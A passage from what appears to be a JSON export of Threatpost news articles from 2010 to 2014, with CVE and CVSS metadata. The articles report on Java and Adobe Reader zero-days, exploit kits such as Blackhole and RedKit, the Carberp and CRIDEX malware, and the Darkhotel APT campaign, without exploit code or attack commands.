and Lin explain. 
This one, on the other hand, allows for arbitrary memory reading and writing in the Java Virtual Machine (JVM) process.\n\nThe exploit is compromising browsers by targeting JVM\u2019s internal data structure, overwriting the memory there to zero in order to download a McRAT executable.\n\nThe exploit is apparently not all that reliable due to the large amount of data it attempts to overwrite. In most cases, Kindlund and Lin are watching JVM crash as it attempts, but ultimately fails, to download the McRAT executable. However, when the payload installs successfully, it reaches out to its command and control server with an HTTP request and starts copying itself into the dynamic link library.\n\nMcRAT is also performing the following pair of registry modifications: \u201cREGISTRYMACHINESYSTEMControlSet001ServicesAppMgmtParameters\u201dServiceDll\u201d = C:Documents and SettingsadminAppMgmt.dll\u201d and \u201cREGISTRYMACHINESYSTEMControlSet001ServicesAppMgmtParameters\u201dServiceDll\u201d = %SystemRoot%System32appmgmts.dll.\u201d\n\nFireEye notified Oracle about the bug before publication and is urging users to disable Java in their browsers or set their Java security settings to \u201chigh\u201d and avoid the execution of unknown Java applets until a patch is shipped. 
Oracle has since assigned a common vulnerability entry to the flaw: CVE-2013-1493.\n\nIt\u2019s been a turbulent couple of months for Java as an absolute torrent of zero-day vulnerabilities has researchers seriously considering [disabling Oracle\u2019s nearly ubiquitous platform altogether](<https://threatpost.com/its-time-abandon-java-012113/>).\n", "cvss3": {}, "published": "2013-03-01T16:34:30", "type": "threatpost", "title": "The Java Zero-Day Procession Continues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-1493"], "modified": "2013-05-13T15:54:08", "id": "THREATPOST:53FFA3071578083E01768081147BA316", "href": "https://threatpost.com/java-zero-day-procession-continues-030113/77575/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:29", "description": "There are a number of compromised sites on the popular blogging platform, WordPress, which, according to [a Trend Labs report](<http://blog.trendmicro.com/compromised-wordpress-sites-drive-users-to-blackhole-exploit-kit>), are actively infecting users with the[ CRIDEX worm](<https://threatpost.com/video-new-banking-trojan-caught-breaking-captcha-013012/>).\n\nThe infections are part of a [social engineering](<https://threatpost.com/mass-wordpress-compromise-fuels-cridex-worm-outbreak-032212/>) campaign that lures users with emails purporting to come from trusted sources like [LinkedIn](<http://www.linkedin.com/>) and [the Better Business Bureau](<http://www.bbb.org/>), Trend Labs warned.\n\nE-mails purporting to come from the Better Business Bureau inform their recipients of a (non-existent) complaint lodged against their business. The email includes a link to the \u201cComplaint Report,\u201d which leads to one of the infected WordPress sites.\n\nPhony LinkedIn emails pose as invitation notifications and pending messages. 
They include a number of links, all of which lead to compromised WordPress sites.\n\nAccording to Trend researchers, users who click the links are subject to Web based attacks that [target a vulnerability in Adobe\u2019s Reader and Acrobat](<https://threatpost.com/waves-attacks-target-adobe-reader-bug-2010-022212/>) software ([CVE-2010-0188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188>)) and a common Windows Help Center vulnerability ([CVE-2010-1885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>)). After exploiting the vulnerabilities, attackers push copies of the Blackhole exploit kit to infect users with the CRIDEX worm.\n\nTrend Labs reports that WORM_CRIDEX.IC is generating a number of random domains using domain generating algorithms (DGA). The technique is commonly used to evade law enforcement and botnet take-downs. The behavior of the sample is dependent upon the specific configuration file, which, in Trend Labs\u2019 case, was unavailable to them. However, based on their static analysis, the malware is capable of executing and deleting files and retrieving certificates from a certificate store.\n\nThis isn\u2019t the first time that [WordPress](<http://wordpress.org/>) sites have been used to push the Blackhole Exploit kit. 
In November of last year, similar reports surfaced in which [WordPress users were being re-directed](<https://threatpost.com/compromised-wordpress-sites-redirecting-black-hole-exploit-kit-servers-110211/>) to servers hosting the Blackhole kit.\n", "cvss3": {}, "published": "2012-03-22T15:44:13", "type": "threatpost", "title": "Mass WordPress Compromise Fuels CRIDEX Worm Outbreak", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2010-1885"], "modified": "2013-04-17T20:05:35", "id": "THREATPOST:0A9F9D2C917F57EAE16B15B6166B45F6", "href": "https://threatpost.com/mass-wordpress-compromise-fuels-cridex-worm-outbreak-032212/76357/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:31", "description": "Adobe \ntoday released an out-of-band security update to patch a pair of gaping \nholes that expose hundreds of millions of computer users to remote code \nexecution attacks.\n\nThe vulnerabilities are rated \u201ccritical\u201d and affect Adobe Reader and Adobe Acrobat on all platforms \u2014 Windows, Mac and Linux.\n\nThis \nPDF Reader/Acrobat update falls outside of the company\u2019s scheduled \nquarterly patch cycle. It is not yet clear why Adobe opted for an \nout-of-band patch but the presence of Microsoft\u2019s security research \nteam as a flaw-finder on this bulletin suggests Redmond may have \npressured Adobe to rush out a fix.\n\nAdobe insists there are no active attacks or exploit code publicly available.\n\nThere is also a clear connection to a [patch released last week](<http://www.adobe.com/support/security/bulletins/apsb10-06.html>) \nfor Adobe Flash Player. 
That Flash patch covered a hole \n(CVE-2010-0186) that could subvert the domain sandbox and make \nunauthorized cross-domain requests.\n\nIn today\u2019s Reader/Acrobat bulletin, the same vulnerability is \nreferenced as affecting Adobe Reader 9.3 for Windows, Macintosh and \nUNIX, Adobe Acrobat 9.3 for Windows and Macintosh, and Adobe Reader 8.2 \nand Acrobat 8.2 for Windows and Macintosh.\n\nAdobe also credited Microsoft\u2019s researcher with discovering a [critical](<http://www.adobe.com/devnet/security/security_zone/severity_ratings.html>) \nvulnerability (CVE-2010-0188) that could cause the application to \ncrash and could potentially allow an attacker to take control of the \naffected system.\n\nFrom the [advisory](<http://www.adobe.com/support/security/bulletins/apsb10-07.html>):\n\n> _Adobe recommends users of Adobe Reader 9.3 and earlier \nversions for Windows, Macintosh and UNIX update to Adobe Reader 9.3.1. \n(For Adobe Reader users on Windows and Macintosh who cannot update to \nAdobe Reader 9.3.1, Adobe has provided the Adobe Reader 8.2.1 update.) \nAdobe recommends users of Adobe Acrobat 9.3 and earlier versions for \nWindows and Macintosh update to Adobe Acrobat 9.3.1. Adobe recommends \nusers of Acrobat 8.2 and earlier versions for Windows and Macintosh \nupdate to Acrobat 8.2.1._\n\nAdobe is shipping these patches via the product\u2019s automatic update \nfacility. The default installation configuration runs automatic updates \non a regular schedule, and can be manually activated by choosing Help \n> Check For Updates Now.\n\n**UPDATE**: Adobe spokeswoman Wiebke Lips answers some of the lingering questions:\n\n_Why go out-of-band with this update? Are there attacks or exploit code in \nthe wild?_\n\nThe \nFlash Player vulnerability we fixed on February 11 also affects Adobe Reader \nand Acrobat. 
Rather than waiting for the next quarterly update for Adobe Reader \nand Acrobat, which is scheduled for April, Adobe decided to make this fix \navailable as an out-of-cycle update. Adobe \nis not aware of any exploits in the wild for any of the issues patched in this release.\n\n_It looks like the Adobe Flash Player flaw from \nlast week now affects Reader/Acrobat. Are you planning on updating the \nFlash bulletin with this \ninformation?_\n\nWe \nactually already disclosed this information on February 11 by issuing a \nseparate advisory for Adobe Reader and Acrobat, which discussed the Flash \nPlayer vulnerability.\n\n_Is there a link between Microsoft finding/reporting the code execution \nbug and the out-of-band release?_\n\nNo \u2014 other than the fact that this particular vulnerability is also fixed in \nthis update. We decided to go out-of-cycle because of the Flash Player \nvulnerability we fixed on February 11 and which also affects Adobe Reader and \nAcrobat. Rather than waiting for the next quarterly update for Adobe Reader and \nAcrobat, which is scheduled for April, Adobe made the decision to make this fix \navailable as an out-of-cycle update.\n", "cvss3": {}, "published": "2010-02-16T21:14:52", "type": "threatpost", "title": "Adobe Plugs Critical PDF Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2018-08-15T13:27:49", "id": "THREATPOST:E11864189C14E8A77A62BA875C735AA4", "href": "https://threatpost.com/adobe-plugs-critical-pdf-code-execution-flaw-021610/73545/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:52", "description": "**UPDATE:** A big wave of emails purporting to be Craigslist notifications but containing links to websites hosting the [Black Hole exploit kit](<https://threatpost.com/black-hole-exploit-kit-available-free-052311/>) hit the Internet yesterday, a day that already was 
filled with drama surrounding the LinkedIn password dump.\n\nThe malicious emails, 150,000 of which were caught by [Websense](<http://community.websense.com/blogs/securitylabs/archive/2012/06/06/malicious-urls-in-fake-craigslist-emails.aspx>) Security Lab\u2019s Cloud Email Security portal yesterday, attempt to convince recipients that \u201cFURTHER ACTION IS REQUIRED TO COMPLETE [THEIR] REQUEST!!!\u201d The emails go on to claim that recipients must follow the (malicious) link below in order to publish, edit or delete their ad or verify their email address. At the bottom of the email is a bold and capped piece of text that helpfully advises that users \u201cKEEP THIS EMAIL.\u201d\n\nIt is not clear if these emails are just blanketing random email addresses or exclusively targeting individuals who are currently running ads on Craigslist. Websense officials didn\u2019t respond to a request for clarification on that point.\n\nIn an email received after publication Thursday afternoon, a Websense spokesperson told Threatpost that the emails did not appear to be targeted specifically toward individuals running ads on Craigslist, but rather that they seemed to be part of a broad spam campaign.\n\nWebsense lists \u201cModels for fine\u201d (systems / network), \u201cStudio4PaintWorkCatskills\u201d (education), and \u201cShow Your Art\u201d (cars+trucks) as a few of the email subjects popping up in the scam. Websense also reports that the malicious emails have seemingly legitimate sender addresses and are convincingly similar in appearance to real automated Craigslist notifications.\n\nThe malicious links in the emails are leading users to a compromised WordPress page containing obfuscated JavaScript in the form of an iframe. 
According to Websense, the attackers are exploiting [CVE-2010-0188](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188>) and [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>).\n", "cvss3": {}, "published": "2012-06-07T16:27:03", "type": "threatpost", "title": "Fake Automated Craigslist Email Notifications Link to Blackhole Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2010-1885"], "modified": "2013-04-17T20:03:31", "id": "THREATPOST:A53F2293D6BF2EC7D120A2CC2B3D2524", "href": "https://threatpost.com/fake-automated-craigslist-email-notifications-link-blackhole-exploit-kit-060712/76661/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:08", "description": "A new exploit kit hit the scene recently, and according to Arseny Levin of Spiderlabs, the RedKit exploit kit contains an API that generates new host-site URLs every hour.\n\nThe authors of the kit haven\u2019t named it, so Levin and Spiderlabs simply chose to call it RedKit in reference to its color scheme.\n\nRedKit\u2019s most salient feature is the API that creates a fresh attack URL every hour. This feature will make it incredibly difficult to reliably block RedKit infected sites. The kit also has a feature that allows its users to upload an executable and test it against 37 different antivirus solutions.\n\nAs of now, Levin writes that RedKit is exploiting two popular (and patched) vulnerabilities. 
One is an obfuscated PDF file that exploits the LibTIFF vulnerability (CVE-2010-0188), and the other is an AtomicReferenceArray [Java](<https://threatpost.com/java-osx-and-cross-platform-nightmare-040912/>) vulnerability (CVE-2012-0507), the same one used by [the Flashback trojan](<https://threatpost.com/new-version-flashback-mac-trojan-found-using-java-exploits-022412/>).\n\nLevin believes that RedKit\u2019s authors will have to add new exploits to their kit sometime soon if they hope to keep up with the industry standard Blackhole and Phoenix exploit kits.\n\nResearchers from SpiderLabs found the RedKit on [some compromised church website](<https://threatpost.com/five-shocking-statistics-latest-internet-threat-report-043012/>) where the kit was being promoted by a banner ad. Users that clicked the ad were redirected to a page that requested their Jabber username. In this way, Levin claims, the RedKit developers can easily pick and choose which individuals they sell their services to.\n\nYou can read the SpiderLabs analysis [here](<http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html>).\n", "cvss3": {}, "published": "2012-05-07T18:46:37", "type": "threatpost", "title": "New Exploit Kit RedKit Discovered in Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2012-0507"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:7B46C96564251E67650F604C0B32BC46", "href": "https://threatpost.com/new-exploit-kit-redkit-discovered-wild-050712/76533/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:52", "description": "APT groups tend to be grouped together in a large amorphous blob of sinister intentions and similar targets, but not all APT crews are created equal. 
Researchers have identified a group that\u2019s been operating in Asia for at least seven years and has been using hotel networks as key infection points to target top executives at companies in manufacturing, defense, investment capital, private equity, automotive and other industries.\n\nThe group, which researchers at Kaspersky Lab are calling Darkhotel, has access to zero day vulnerabilities and exploits and has shown a willingness to use them in situations where the zero days might be discovered. One of the zero days the group has used is a Flash vulnerability that was disclosed in February.\n\n\u201cThis crew occasionally deploys 0-day exploits, but burns them when required. In the past few years, they deployed 0-day spear-phishing attacks targeting Adobe products and Microsoft Internet Explorer, including CVE-2010-0188. In early 2014, our researchers exposed their use of CVE-2014-0497, a Flash 0-day described on Securelist in early February,\u201d the [Darkhotel report](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/22103959/darkhotel_kl_07.11.pdf>) says.\n\n\u201cThe crew spear-phished a set of target systems connected to the internet through Chinese ISPs, and developed capabilities within the 0-day exploits to handle hardened Windows 8.1 systems. It\u2019s interesting that the flash objects were embedded in Korean documents titled \u201clist of the latest Japanese AV wind and how to use torrents.docx\u201d (loose English translation).\u201d\n\nThe Darkhotel group has been operating mainly in Asian countries, but there have been infections recorded in the United States, South Korea, Singapore, Germany, Ireland and many others, as well. The key infection method for this group is the compromise of WiFi networks in business hotels. 
When users connect to the network, they are presented with a dialog box prompting them to install a fake update, typically something that looks legitimate, such as Adobe Flash. If a victim agrees to install the fake update, he instead receives a digitally signed piece of malware, courtesy of the attackers. The malware has keylogging and other capabilities and steals information, which is then sent back to the attackers.\n\n\u201cWhen unsuspecting guests, including situationally aware corporate executives and high-tech entrepreneurs, travel to a variety of hotels and connect to the internet, they are infected with a rare APT Trojan posing as any one of several major software releases. These might be GoogleToolbar, Adobe flash, Windows Messenger, etc. This first stage of malware helps the attackers to identify more significant victims, leading to the selective download of more advanced stealing tools,\u201d the report says.\n\n\u201cAt the hotels, these installs are selectively distributed to targeted individuals. This group of attackers seems to know in advance when these individuals will arrive and depart from their high-end hotels. So, the attackers lay in wait until these travelers arrive and connect to the internet.\u201d\n\nThe Darkhotel group\u2019s extensive infrastructure includes access to some of the hotels\u2019 systems that maintain the registration information for guests. This allows the attackers to target specific incoming guests at compromised hotels. Not every guest connecting to the WiFi network is given the fake update installer that leads to the malware installation. Instead, the attackers pick and choose which guests they want to go after, aiming for high-value targets.\n\nIn addition, the Darkhotel attackers are using a variety of digital certificates to sign their malware. 
Attackers often employ stolen certificates in this way, but the Darkhotel group seems to have taken a different tack, duplicating legitimate certificates that have weak keys.\n\n\u201cAll related cases of signed Darkhotel malware share the same Root Certificate Authority and intermediate Certificate Authority that issued certificates with weak md5 keys (RSA 512 bits). We are confident that our Darkhotel threat actor fraudulently duplicated these certificates to sign its malware. These keys were not stolen,\u201d the report says.\n\nIn 2011, Microsoft revoked trust in a number of certificates with 512-bit keys issued by DigiCert Sdn. Bdh, a Malaysian certificate authority, warning that the weak keys could allow an attacker to break the keys and duplicate the certificates. That appears to be what the Darkhotel attackers did, replicating these certificates for use in their malware campaigns.\n\n\u201cThey abuse weakly implemented digital certificates to sign their malcode. The actor abused the trust of at least ten CAs in this manner. Currently they are stealing and re-using other legitimate certificates to sign their mostly static backdoor and infostealer toolset. Their infrastructure grows and shrinks over time, with no consistent pattern to the setup. 
It is both protected with flexible data encryption and poorly defended with weak functionality,\u201d the Kaspersky Lab GReAT team wrote in an [explanation](<https://securelist.com/blog/research/66779/the-darkhotel-apt/>) of the attack.\n\n_Image from Flickr photos of [Calitexican](<https://www.flickr.com/photos/calitexican/>)._\n", "cvss3": {}, "published": "2014-11-10T10:41:41", "type": "threatpost", "title": "Darkhotel APT Group Targeting Top Executives in Long-Term Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2014-0497"], "modified": "2018-03-22T14:40:02", "id": "THREATPOST:C404EBFD14DC830CEDE2FF6F7565FAE6", "href": "https://threatpost.com/darkhotel-apt-group-targeting-top-executives-in-long-term-campaign/109265/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:28", "description": "\n\nOn 20 March, Russian law enforcement agencies announced the arrest of a cybercriminal gang involved in stealing money using the Carberp Trojan. This is very good news, but unfortunately does not mark the end of the Carberp story.\n\nEvidently, those arrested were just one of the criminal gangs using the Trojan. At the same time, those who actually developed Carberp are still at large, openly selling the Trojan on cybercriminal forums.\n\nHere is a recent offer for the \u2018multifunctional bankbot\u2019, which appeared on 21 March:\n\n\n\n_A post advertising the sale of Carberp_\n\nThere are still numerous \u2018affiliate programs\u2019 involved in the distribution of Carberp, particularly \u201ctraffbiz.ru\u201d.\n\nWe detected a new Carberp distribution incident on 21 March. 
Infection was initiated at radio-moswar.ru, a website devoted to the MosWar online browser game.\n\n_The main page of radio-moswar.ru_\n\nA page on the site includes a script which quietly redirects visitors to a web page in a third-level domain.\n\n_The script redirecting users from radio-moswar.ru_\n\nThe second-level domain belongs to Dyn \u2013 a company that offers free services for the creation of free *.dyndns.TLD third-level domains. Such services are popular among cybercriminals as they make it unnecessary to register new domains.\n\n_Screenshot of the dyndns.tv website_\n\nA series of redirects to different DynDns domains ultimately leads to a script of the traffbiz affiliate program. Officially, the program acts as an intermediary between webmasters and traffic buyers, but according to our information, it is mostly used by cybercriminals to distribute malware.\n\n_Screenshot of the traffbiz.ru website_\n\nA script generates the hit counter image that is shown to users. The script also includes two iframes which quietly redirect users to two links.\n\n_The hit counter code on traffbiz.ru_\n\nOne of the links leads to Java (CVE-2011-3544) and PDF (CVE-2010-0188) exploits that download Trojan-Spy.Win32.Carberp.epm to the victim machine and launch it.\n\nThe Trojan attempts to connect to the command server by sending requests to three domains:\n\n****case-now.com\n\n****ssunrise.com\n\n****owfood-cord.com\n\nCuriously, according to whois data, these domains were registered on 20 March.\n\nThe command server to which Carberp connects is operational. It sends the command to the bot to download configuration files specifying which information the bot should steal and how. 
During the attack, Carberp intercepts the content of Citibank and Raiffeisen Bank webpages on the computer, as well as pages that use software created by BSS, a company which develops and deploys automated remote banking systems.\n\nThe second link leads to the infamous BlackHole Exploit Pack, which downloads and launches two malicious programs: a version of Carberp (Trojan-Spy.Win32.Carberp.epl) and a password-stealing Trojan (Trojan-PSW.Win32.Agent.acne).\n\nCarberp also connects to a server located in Germany which has a different IP address. The domain name ****ltd.info was registered on 21 March:\n\n\n\nThe command center is operational but is not sending any commands as yet. The Trojan receives a list of plugins from that server.\n\nThe second piece of malware installed by the BlackHole Exploit Pack is designed to steal sensitive user data, such as FTP passwords. In addition, the Trojan modifies the hosts file to redirect users from vkontakte.ru and narod.ru sites to malicious servers.\n\nIn short, those responsible for developing Carberp remain at large and the cybercriminal gangs using the Trojan remain active. 
In other words, victory is a long way off.\n\n_*Vyacheslav Zakorzhevsky is a Senior Malware Analyst in Kaspersky Lab\u2019s heuristic detection group._\n", "cvss3": {}, "published": "2012-03-27T15:40:32", "type": "threatpost", "title": "Carberp: It's Not Over Yet", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2011-3544"], "modified": "2013-05-01T20:53:44", "id": "THREATPOST:CD301FF1D3DD46EB2F853FDCD1BEC6DE", "href": "https://threatpost.com/carberp-it-s-not-over-yet-032712/76370/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Attackers exploiting the [Microsoft Windows and Office zero day](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) revealed yesterday are using an exploit that includes a malicious RAR file as well as a fake Office document as the lure, and are installing a wide variety of malicious components on newly infected systems. The attacks seen thus far are mainly centered in Pakistan.\n\nThe [CVE-2013-3906](<http://technet.microsoft.com/en-us/security/advisory/2896666>) vulnerability, disclosed Tuesday by Microsoft, is a remote code execution flaw that involves the way that Windows and Office handle some TIFF files. Microsoft said that attackers who are able to exploit the bug would be able to run arbitrary code on compromised machines. 
In the targeted attacks seen by researchers so far, attackers are using ROP techniques to exploit the vulnerability and then installing a downloader that pulls down some additional components, including an Office document that is shown to the user as a distraction from what\u2019s going on in the background.\n\nResearchers at AlienVault analyzed the exploit and malware being used in the targeted attacks and found that once the attackers have compromised the machine, they also download a RAR file that includes components that call back out to the command-and-control server and then download a number of malicious components. The malware installs a keylogger, a remote backdoor and a component that steals various files, including XLS, DOC, PPT and PDF files.\n\nThe CVE-2013-3906 vulnerability affects Windows Vista and Office 2003-2010 and Microsoft recommended that users running vulnerable versions install the FixIt tool they released Tuesday, which helps prevent exploitation. Installing the [EMET toolkit](<http://www.microsoft.com/en-us/download/details.aspx?id=39273>) also can protect users against attacks on this vulnerability.\n\nMost of the IPs connecting to the C&Cs used in these attacks are coming from Pakistan, the AlienVault researchers said. Researchers at Kaspersky Lab analyzed the malware and its behavior and found some interesting behavior.\n\n\u201cThis is not the first vulnerability in TIFF. The notorious CVE-2010-0188 (based on TIFF too) is widely used in PDF exploits even now. The new 0day uses malformed TIFF data included in Office documents in order to run a shellcode using heap spray and ROP techniques. We have already researched some shellcodes \u2013 they perform common actions (for shellcodes): search API functions, download and launch payload. We took a glance at a downloaded payload \u2013 backdoors and Trojan-spies. Our AEP technology prevents a launch of any executable file by exploited applications. 
In this case our AEP protected and continues protecting users too,\u201d said Vyacheslav Zakorzhevsky, head of the vulnerability research group at Kaspersky.\n\n_Image from Flickr photos of [Elliott Brown](<http://www.flickr.com/photos/ell-r-brown/>)._\n", "cvss3": {}, "published": "2013-11-06T11:21:12", "type": "threatpost", "title": "Attacks on New Microsoft Zero Day Using Multi-Stage Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2013-3906"], "modified": "2013-11-07T22:30:17", "id": "THREATPOST:E88DFBEC6B78D86A1E68E98C05E24C04", "href": "https://threatpost.com/attacks-on-new-microsoft-zero-day-using-multi-stage-malware/102833/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:20", "description": "A malvertising campaign that\u2019s lasted almost half a year is staying alive thanks to infected web advertisements being circulated by otherwise clean ad networks.\n\nThe campaign, now in its fifth month, relies on the Dynamic Domain Name System (DDNS) to keep it from being caught according to a report from Symantec\u2019s [Security Response blog](<https://threatpost.com/report-malvertising-campaign-thrives-dynamic-dns-021113/>) that likens its relationship to a \u201cnever-ending story.\u201d\n\nAttackers have been leveraging the ads by inserting their own obfuscated JavaScript into ad network ads. 
The JavaScript helps attackers gauge whether or not victims are running older versions of Internet Explorer and from there, installs tracking cookies and redirects users to a sketchy domain of their choosing.\n\nThe domains change often \u2013 Symantec notes it\u2019s seen the campaign filter users through more than 50 different URLs since its inception in October 2012.\n\nOnce guided to the site, the campaign recognizes the user\u2019s build of Java so multiple JAR files can be dropped onto the system.\n\nThe JAR files target a handful of IE-related Java vulnerabilities ([CVE-2012-4681](<https://threatpost.com/oracle-releases-fix-java-cve-2012-4681-flaw-083012/>) and [CVE-2013-0422](<https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/>)) and build a dynamic-link library (DLL) that then allows attackers to download malware to the machine.\n\nAccording to Cisco\u2019s 2013 Annual Security Report [issued last month](<https://threatpost.com/report-mainstream-websites-host-majority-malware-013113/>), malvertising, the delivery of malware via online ads, \u201cplayed a more significant role in web malware encounters in 2012 than in 2011,\u201d with about 83 percent of malware on the web coming from malicious iframes and scripts last year.\n", "cvss3": {}, "published": "2013-02-11T20:40:31", "type": "threatpost", "title": "Report: Malvertising Campaign Thrives on Dynamic DNS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-4681", "CVE-2013-0422"], "modified": "2013-04-17T16:30:45", "id": "THREATPOST:BE60E44ECF7AB415C00BABCA0001D0A6", "href": "https://threatpost.com/report-malvertising-campaign-thrives-dynamic-dns-021113/77514/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:34", "description": "Microsoft can take some solace that it is not alone in sending out security updates that don\u2019t fully address a zero-day 
vulnerability. A researcher at Immunity Inc. put Oracle on a similar hot seat this week when he reported that a recent [out-of-band Java update](<https://threatpost.com/emergency-zero-day-patch-does-not-quiet-calls-disable-java-011413/>) repaired only one of two Java flaws being actively exploited.\n\nEsteban Guillardoy said the [Java 1.7 u11 update was incomplete](<http://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html>) and cautioned that new exploits could easily pair another zero-day with the remaining unpatched vulnerability and kick off a new spate of attacks.\n\n\u201cAn attacker with enough knowledge of the Java code base and the help of another zero day bug to replace the one fixed can easily continue compromising users,\u201d Guillardoy said.\n\nMeanwhile, IT managers are caught in the middle of a patch management mess. Since the start of the year, not only has a rash of unreported vulnerabilities been exploited in high-profile attacks, but vendor patches or workarounds have fallen short.\n\nMicrosoft\u2019s temporary Fix It for a zero-day in Internet Explorer that was being exploited in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) was quickly [bypassed by researchers at Exodus Intelligence](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). Users of IE 6-8\u2014still the largest install base of the browser\u2014were exposed as early as Dec. 7 when websites serving exploits were first detected; they were publicly reported shortly after Christmas Day. Microsoft made its Fix It available Dec. 29; the bypass was reported Jan. 4 and users remained open to attack until an out-of-band patch was released on Monday.\n\nOracle, meanwhile, won\u2019t have another official Java security update release until Feb. 19. 
Security Explorations of Poland, a research firm known for its work on Java vulnerabilities, said it reported flaws to Oracle in April and September of last year that still have not been patched.\n\nOracle may have another zero day to add to its list for February as well. Security blog [Krebs on Security](<http://krebsonsecurity.com/2013/01/new-java-exploit-fetches-5000-per-buyer/>) reported yesterday another exploit for a different zero day was being sold on a limited basis for $5,000. The blog reported that two versions of the exploit were available\u2014weaponized and source code\u2014and that the sale would be limited to two buyers. A post on the underground forum where this was observed said the new exploit had not been included in any exploit kit, unlike the previous Java zero day which was included in all the major packs including Blackhole, Cool, Nuclear Pack and others. The post has since been removed from the forum, likely indicating the sale is over.\n\nIn the meantime, Oracle has to shore up the Java vulnerability it thought had been patched in 7u11. The Oracle patch was believed to have addressed two vulnerabilities, both covered by [CVE-2012-0422](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>). According to [Oracle\u2019s Java SE documentation](<http://docs.oracle.com/javase/6/docs/technotes/guides/reflection/index.html>), one of the bugs involves reflection, which enables Java to discover information about the constructors and other devices in loaded classes and to operate on underlying counterparts within security restriction. The API, Oracle said, is the go-between for applications.\n\nThe second vulnerability in question is in the MBeanInstantiator, a flaw that when used with the reflection API with recursion bypasses a security check, the Java sandbox. 
It is the MBeanInstantiator vulnerability that Immunity\u2019s Guillardoy said has not been addressed in the update.\n\n\u201cThe patch (which is Java 7 update 11) doesn\u2019t show any difference at all in the classes inside com.sun.jmx.mbeanserver package,\u201d he wrote. \u201cIt appears then that the MBeanInstantiator.findClass vulnerability is still there in the latest Java update.\u201d\n\nHe said he wrote a simple proof of concept that retrieved restricted Java classes, proving an exploit is still possible.\n\n\u201cSometimes for everyone involved in the offensive world, you need to look at the patch with special detail, because sometimes the vendor stops the worm/0day exploit with a patch, but doesn\u2019t necessary fix all of the associated problems,\u201d Guillardoy wrote. \u201cAnd of course, being only human, sometimes the vendor\u2019s team just plain messes up the patch.\u201d\n\nOracle released Java 1.7u11 on Sunday, four days after exploits were discovered in the wild. The update not only said it addressed vulnerabilities being exploited, but also changed the default Java security level from medium to high. As a result, any unsigned or self-signed Java applications would no longer run by default and would require a user to approve execution of the applet.\n\nSecurity experts said it was a good first step, but an attacker could still use social engineering to trick a user into executing a malicious Java applet. 
Attackers could also steal valid digital certificates and sign malicious applets so that they would run without intervention.\n\nWhile these [Java exploits](<https://www.securelist.com/en/blog/208193822/The_Current_Web_Delivered_Java_0day>) were targeting Windows machines, Java\u2019s ubiquity on all platforms makes it an attractive target for attackers.\n\n\u201cIf you have an exploit for memory issues and the exploit is reliable, you don\u2019t have to code a different exploit for different languages or platforms, it just works everywhere,\u201d said Jaime Blasco, manager of AlienVault Labs. \u201cYou will have 100 percent probability of exploiting the target if it is vulnerable to that issue.\u201d\n\n_This article was updated on Jan. 17 to clarify that CVE-2012-0422 covers both Java vulnerabilities. _\n", "cvss3": {}, "published": "2013-01-17T15:34:07", "type": "threatpost", "title": "Java 7u11 Update Addresses Only One of Two Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0422", "CVE-2013-0422"], "modified": "2013-05-10T14:16:59", "id": "THREATPOST:AFC9652044AAA8085D4A4A3B6D721484", "href": "https://threatpost.com/java-7u11-update-addresses-only-one-two-zero-day-vulnerabilities-011713/77417/", "cvss": {"score": 10.0, "vector": 